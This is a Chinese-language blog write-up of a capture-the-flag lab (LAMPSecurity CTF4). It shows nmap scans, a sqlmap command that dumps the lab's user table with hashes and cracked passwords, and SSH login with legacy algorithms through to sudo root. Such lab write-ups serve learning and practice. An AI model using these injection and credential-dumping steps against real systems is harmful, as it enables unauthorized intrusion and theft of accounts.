LAMPSecurityCTF4靶机渗透流程

已于 2023-07-14 18:53:57 修改
阅读量209 收藏
点赞数
文章标签: 安全
于 2023-07-11 20:20:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RemedyVI/article/details/131668352
版权

信息收集

主机探测

靶机IP地址:192.168.88.138

初步扫描

sudo nmap -sT --min-rate 10000 -p- 192.168.88.138

详细信息扫描

sudo nmap -sT -sC -sV -O -p 22,25,80,631 192.168.88.138  

可以知道

22端口OpenSSH 4.3(版本较低可能存在漏洞)

25端口Sendmail 8.13.5/8.13.5

80端口Apache httpd 2.2.0 (版本较低可能存在漏洞)

操作系统大概率是Linux

网页标题 Prof. Ehks

一些可能有趣的目录:
/mail/ /restricted/ /conf/ /sql/ /admin/

漏洞脚本扫描 

sudo nmap -sT --script=vuln -p 22,25,80,631 192.168.88.138

可以明确的看到80端口大概率存在SQL注入漏洞,虽然也有慢速连接DOS攻击但是渗透测试不考虑。

UDP扫描 

没有有效收获

漏洞发现 

访问80端口,除了header部分,其它看不懂,估计不是英文。检查源代码没有额外信息。

访问blog页面,观察到url疑似有SQL注入,同时刚刚用nmap扫描时也告知了我们。

漏洞验证

首先输入一个引号发现报错了,但是没有具体报错信息,同时也没有回显点。

http://192.168.88.138/index.html?page=blog&title=Blog&id=2’

接着试了好几个闭合方式都不行,结果整数型闭合可以用。初步判断存在布尔盲注和时间盲注,可以用and sleep(5)判断时间盲注。

漏洞利用

使用sqlmap爆破数据库

sudo sqlmap -u "http://192.168.88.139/index.html?page=blog&title=Blog&id=1" --risk 3 --level 5 --dbs --dump  --batch

获取到一些用户,有可能是SSH登录账户,也有可能是网站后台登录的账户。
+---------+-----------+--------------------------------------------------+

| user_id | user_name | user_pass                                        |

+---------+-----------+--------------------------------------------------+

| 1       | dstevens  | 02e823a15a392b5aa4ff4ccb9060fa68 (ilike2surf)    |

| 2       | achen     | b46265f1e7faa3beab09db5c28739380 (seventysixers) |

| 3       | pmoore    | 8f4743c04ed8e5f39166a81f26319bb5 (Homesite)      |

| 4       | jdurbin   | 7c7bc9f465d86b8164686ebb5151a717 (Sue1978)       |

| 5       | sorzek    | 64d1f88b9b276aece4b0edcc25b7a434 (pacman)        |

| 6       | ghighland | 9f3eb3087298ff21843cc4e013cf355f (undone1)       |

+---------+-----------+--------------------------------------------------+

SSH登录 

尝试用上面数据库爆出来的用户密码进行SSH登录,发现靶机的SSH版本太老了,与kali的密钥交换方法不一致。

尝试启用靶机指定的密钥交换方法

$ sudo ssh -oKexAlgorithms=diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 dstevens@192.168.88.139

Unable to negotiate with 192.168.88.139 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss
发现再次报错

 修改之后再次尝试

sudo ssh -oHostKeyAlgorithms=+ssh-rsa,ssh-dss -oKexAlgorithms=+diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 dstevens@192.168.88.139

成功登录,并且发现可执行sudo所有操作。

切换到root

总结

碰巧能够登录SSH只能说运气比较好,但是实际渗透中这种情况很少,如果不是这样的话那这台靶机就不会是这么简单了。

总轨发现了3个可登录的目录/admin/mail/restricted/,都可以用上面的用户中的一些或全部登录。一个关于数据库敏感信息/sql/sq.db,还有一些带有提示性的文件。
内容为:一个日历目录

http://192.168.88.139/calendar/index.php?action=display&year=2023&month=6

Teardrop、
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CTF之LAMPSecurity CTF4 靶机渗透(SQL注入)
afei001
08-06 927
  练习环境     攻击机:kali     靶机LAMPSecurity: CTF4     下载地址:https://download.vulnhub.com/lampsecurity/ctf4.zip      1.发现靶机端口扫描 root@afei:~# ifconfig eth0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.99.177 netmask 255.
网络渗透实验四 CTF实践
qq_40525803的博客
12-05 583
网络渗透实验四 CTF实践 实验目的:通过对目标靶机渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。熟悉网络扫描、探测HTTP web服务、目录枚举、提权、图像信息提取等相关工具的使用。 系统环境:Kali Linux 2、WebDeveloper靶机来源:https://www.vulnhub.com/ 实验工具:不限 实验原理: 1、什么是CTF CTF(Capture The Flag)中文一般译
LampSecurity-CTF4 靶场记录
m0_52729465的博客
08-15 177
1、首先进行常规nmap扫描,发现四个端口,22,25,80,631。2、打开web界面,发现不像是英语,而是其他语言,没有可利用信息,再查看–script-vuln扫出来的信息发现可能存在sql注入漏洞,测试后发现存在sql注入漏洞。3、使用sqlmap对数据库进行注入,查看到user表中的数据,里面有六组账号密码,尝试使用ssh登录。4、在ssh登录过程中发现报错,查看报错信息是服务器和客户端的算法不一致导致无法登录,在ssh后面将报错内提供的算法写进参数即可正常使用ssh。
网络渗透测试实验四-CTF实践(WebDeveloper靶机渗透
YatKTm的博客
12-06 3269
文章目录前言实验目的系统环境实验工具实验原理:1、什么是CTF1.1 CTF竞赛模式(1)解题模式(Jeopardy)(2)攻防模式(Attack-Defense)(3)混合模式(Mix)1.2 CTF各大题型简介MISC(安全杂项)PPC(编程类)CRYPTO(密码学)STEGA(隐写)PWN(溢出)WEB(web类)实验步骤和内容:目的基本思路实现过程:1、发现目标 (netdiscover),找到WebDeveloper的IP地址。2、利用NMAP扫描目标主机,发现目标主机端口开放、服务情况,截图并说
红队打靶:LampSecurity:CTF4打靶思路详解(vulnhub)
Bossfrank的博客
06-19 1602
本文对vulnhub中靶机LampSecurity:CTF4进行了打靶。核心步骤就是发现数据库查询参数->使用sqlmap进行注入->拿到用户名和密码->ssh登录,由于靶机较为老旧,现在我们可以使用许多自动化脚本工具进行渗透,但核心还是要了解渗透的思路和各种针对漏洞的脚本编写原理,而非单纯的使用工具。
【学渗透靶机——lampSecurityCTF4
jieli0901227的博客
05-13 299
page=blog&title=Blog&id=2 地址存在注入。发现sudo - l 发现该账号sudo 可执行root 所有命令,并且不需要密码。2、使用 order by 判断数据库的列。5、查询user 表的字段信息。4、查询当前数据库有哪些表。3、使用联合注入找报错点。nmap 主机漏洞探测。扫描出也没什么有用信息。1、通过浏览页面发现。
DC-4靶机渗透
weixin_45349299的博客
12-21 1002
开放的端口:22 => ssh服务 ---- OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)80 => http服务 ---- nginx 1.15.10扫描出来的网站目录。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个...通过深入研究和实践这些靶机,新手能够逐渐熟悉渗透测试的流程和技术,为未来从事网络安全工作打下坚实的基础。
DC-4-Web渗透测试靶机
01-19
【DC-4-Web渗透测试靶机】是一个专门为网络安全专业人士设计的模拟环境,主要用于学习和实践Web渗透测试技术。在Web渗透测试中,目标是识别并利用网站应用程序的安全漏洞,以便于预防或修复这些漏洞,保护真实的网络...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
深入探讨安全验证:OAuth2.0、Cookie与Session、JWT令牌、SSO与开放授权平台设计
努力的小雨,一个阳光向上的博客不仅仅给你知识更希望带给你快乐
08-09 948
CSRF(Cross-Site Request Forgery)攻击是一种利用受害者在已经认证的状态下执行非意愿操作的攻击方式。攻击者通过诱使受害者访问恶意网站或点击恶意链接,来执行未经授权的操作,例如修改密码、进行转账等,简单来说就是,由于cookie是在浏览器共享的,所以一旦设置了cookie,那么当你打开另一个tab页的时候,也会携带过去,那么其他站点就可以使用cookie进行攻击,具体如下:比如:当你在浏览器中打开银行A的网页并成功登录后,你想要进行转账操作。
DLMS/COSEM中的信息安全安全密钥(中)
huaqianzkh的专栏
08-09 642
PKI是安全基础设施它创造和管理公钥证书以便于使用公钥(即非对称密钥)加密。为了实现这一目标,PKI需要执行两个基本任务:a)验证绑定的准确性后,生成和分发公钥证书将公钥绑定到其他信息;b)维护和分发未到期证书的证书状态信息。对于DLMS/COSEM,可以预料分层PKI包括如图23所示的以下组件。——根证书机构(Root-CA);——证书机构/下属机构(Sub-CA);——终端实体:不颁发证书的实体:DLMS/COSEM客户机,DLMS/COSEM服务器和第三方。
Linux安全与高级应用(四)深入探索MySQL数据库:安装、管理与安全实践
洛秋的博客
08-07 1470
Linux:作为操作系统,提供稳定的运行环境。Apache:作为Web服务器,处理HTTP请求。MySQL:作为数据库管理系统,存储和管理数据。:作为脚本语言,生成动态网页。LAMP平台的优势在于其成本低廉、可定制性强、易于开发、方便易用且安全稳定。这使得LAMP成为许多企业和开发者的首选平台。通过以上步骤,我们完成了LAMP平台的部署及其主要组件的配置和测试。LAMP平台的搭建不仅为Web开发提供了一个强大的环境,同时也展现了其在成本和效率上的优势。
CC攻击解决方案,如何处理CC攻击
dexunyun的博客
08-09 782
CC攻击作为网络世界中的一大威胁,对网站的安全与稳定构成了严峻挑战。然而,通过部署安全加速SCDN,我们可以有效应对CC攻击,确保网站的安全与稳定。作为网络管理员和网站拥有者,我们应时刻保持警惕,不断提升自身的安全防护能力,为用户提供更加安全、可靠的网络服务。
自学黑客(网络安全
热门推荐
2301_77160226的博客
08-05 2万+
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
Linux安全与高级应用(十一)Linux防火墙策略中的SNAT与DNAT应用解析
最新发布
洛秋的博客
08-12 584
SNAT和DNAT策略在Linux防火墙配置中占据着重要地位,它们不仅解决了网络地址转换的问题,还为网络安全提供了多层次的防护手段。在企业网络环境中,合理运用SNAT与DNAT策略,可以有效提升网络资源的利用率,同时大大增强网络的安全性。随着网络技术的不断发展,防火墙策略也将更加复杂和多样化,SNAT和DNAT将继续在网络安全领域发挥重要作用。掌握和灵活运用这些策略,将有助于应对未来网络安全中的各种挑战。
Linux系统安全及应用(二):PAM安全认证
shyuu的博客
08-12 654
Linux系统安全及应用(二),详解PAM安全认证
Zico2靶机渗透测试实战指南
为了开始这个渗透实战,我们需要准备一个测试机(如Kali Linux 2020.4)和Zico2靶机,两者都应设置为NAT模式并确保它们与宿主机(如Windows 10)在同一网络段内。Zico2虚拟机的下载链接和提取码也在摘要中给出。 ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值